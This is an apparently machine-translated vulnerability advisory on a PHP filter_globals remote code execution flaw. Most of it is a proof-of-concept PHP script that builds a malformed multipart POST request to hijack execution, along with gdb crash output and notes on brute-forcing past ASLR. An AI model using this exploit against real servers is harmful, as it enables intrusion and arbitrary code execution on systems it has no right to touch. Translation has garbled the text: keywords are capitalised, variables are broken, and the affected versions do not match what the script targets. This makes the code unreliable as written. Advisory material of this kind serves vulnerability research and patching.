PHP "filter_globals" structure Arbitrary Code Execution Vulnerability

Release date:
Updated on:

Affected Systems:
PHP 5.2.x
Unaffected system:
PHP 5.3
Description:
--------------------------------------------------------------------------------
Bugtraq id: 52065

PHP is a script language running on a computer. It is mainly used to process dynamic web pages, including command line interfaces or graphical user interface programs.

PHP has a remote code execution vulnerability in the implementation of the filter_globals structure. Attackers can exploit this vulnerability to execute arbitrary code and control applications.

<* Source: Worawit Wang
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Worawit Wang () provides the following test methods:

<? Php
/* This script generates a POST header that makes PHP 5.4.0RC6*64 bit * try to execute code at 0x1111111111111111
(C) Copyright 2012 Stefan Esser
PHP 5.3.9 requires you to know the address of a writable address filled with NULL.
32bit requires you to create a fake 32bit Hashtable instead of a 64bit one
Because this vulnerability also allows leaking memory addresses ASLR can be "semi"-defeated. This means around und 4000
Tries = 4000 requests = 4000 crashes are enough to bruteforce code addresses to execute arbitrary code despite ASLR/NX
Better exploit might be possible after deeper research + heap massage
This specific attack only works if there is no Suhosin-Patch-> RHEL, CentOS
(Gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x00007fd959ca5f9d in _ records (ht = 0x7fd96480d508, h = 0, pData = 0x7fff75c47bd0, nDataSize = 8, pDest = 0x7fff75c47bc8, flag = 1,
_ Zend_filename = 0x7fd95a061b68 "/home/user/Downloads/php-5.4.0RC6/Zend/zend_hash.h", _ zend_lineno = 350)
At/home/user/Downloads/php-5.4.0RC6/Zend/zend_hash.c: 398
398 ht-> pDestructor (p-> pData );
(Gdb) I r
Rax 0x7fd9583352a0 140571464389280
Rbx 0x0 0
Rcx 0x8 8
Rdx 0x111111111111111 76861433640456465
Rsi 0x7 fd95a077b08 140571495070472
Rdi 0x7fd9583352a0 140571464389280
Rbp 0x7fff75c47ae0 0x7fff75c47ae0
Rsp 0x7fff75c47a80 0x7fff75c47a80
R8 0x7fff75c47bc8 140735169199048
R9 0x1 1
R10 0x6238396661373430 7077469926293189680
R11 0x7fd962f4c8e0 140571644840160
R12 0x7fd966b91da8 140571708038568
R13 0x0 0
R14 0xffffffff00000001-4294967295
R15 0x7fd964b10538 140571673953592
Rip 0x7fd959ca5f9d 0x7fd959ca5f9d <_ zend_hash_index_update_or_next_insert + 477> eflags 0x10206 [pf if rf]
Cs 0x33 51
Ss 0x2b 43
Ds 0x0 0
Es 0x0 0
Fs 0x0 0
Gs 0x0 0
(Gdb) x/5i $ rip
=> 0x7fd959ca5f9d <_ zend_hash_index_update_or_next_insert + 477>: callq * % rdx
0x7fd959ca5f9f <_ zend_hash_index_update_or_next_insert + 479>: cmpl $0x8,-0x3c (% rbp)
0x7fd959ca5fa3 <_ blank + 483>: jne 0x7fd959ca6031 <_ blank + 625> 0x7fd959ca5fa9 <_ blank + 489>: mov-0x18 (% rbp), % rax
0x7fd959ca5fad <_ zend_hash_index_update_or_next_insert + 493>: mov 0x10 (% rax), % rax
(Gdb)
*/
$ Boundary = md5 (microtime ());
$ Varname = "xxx ";
$ Payload = "";
$ Payload. = "-- $ boundary \ n ";
$ Payload. = 'content-Disposition: form-data; name = "'. $ varname.'" '. "\ n ";
$ Payload. = chr (16 );
For ($ I = 1; $ I <7*8; $ I ++ ){
$ Payload. = chr (0 );
}
For ($ I = 1; $ I <8; $ I ++ ){
$ Payload. = "\ x11 ";
}
$ Payload. = chr (1 );
For ($ I = 16 + 48 + 1; $ I <128; $ I ++ ){
$ Payload. = chr (0 );
}
$ Payload. = "\ n ";
For ($ I = 0; I I <1000; $ I ++ ){
$ Payload. = "-- $ boundary \ n ";
$ Payload. = 'content-Disposition: form-data; name = "aaa'. $ I. '"'. "\ n ";
$ Payload. = "aaa \ n ";
}
$ Payload. = "-- $ boundary \ n ";
$ Payload. = 'content-Disposition: form-data; name = "'. $ varname.' []" '. "\ n ";
$ Payload. = "aaa \ n ";
$ Payload. = "-- $ boundary \ n ";
$ Payload. = 'content-Disposition: form-data; name = "'. $ varname.' [0]" '. "\ n ";
$ Payload. = "aaa \ n ";
$ Payload. = "-- $ boundary -- \ n ";
Echo "POST/index. php HTTP/1.0 \ n ";
Echo "Content-Type: multipart/form-data; boundary = $ boundary \ n ";
Echo "Content-Length:", strlen ($ payload), "\ n ";
Echo "\ n ";
Echo "$ payload ";
?>

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

PHP
---
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://www.php.net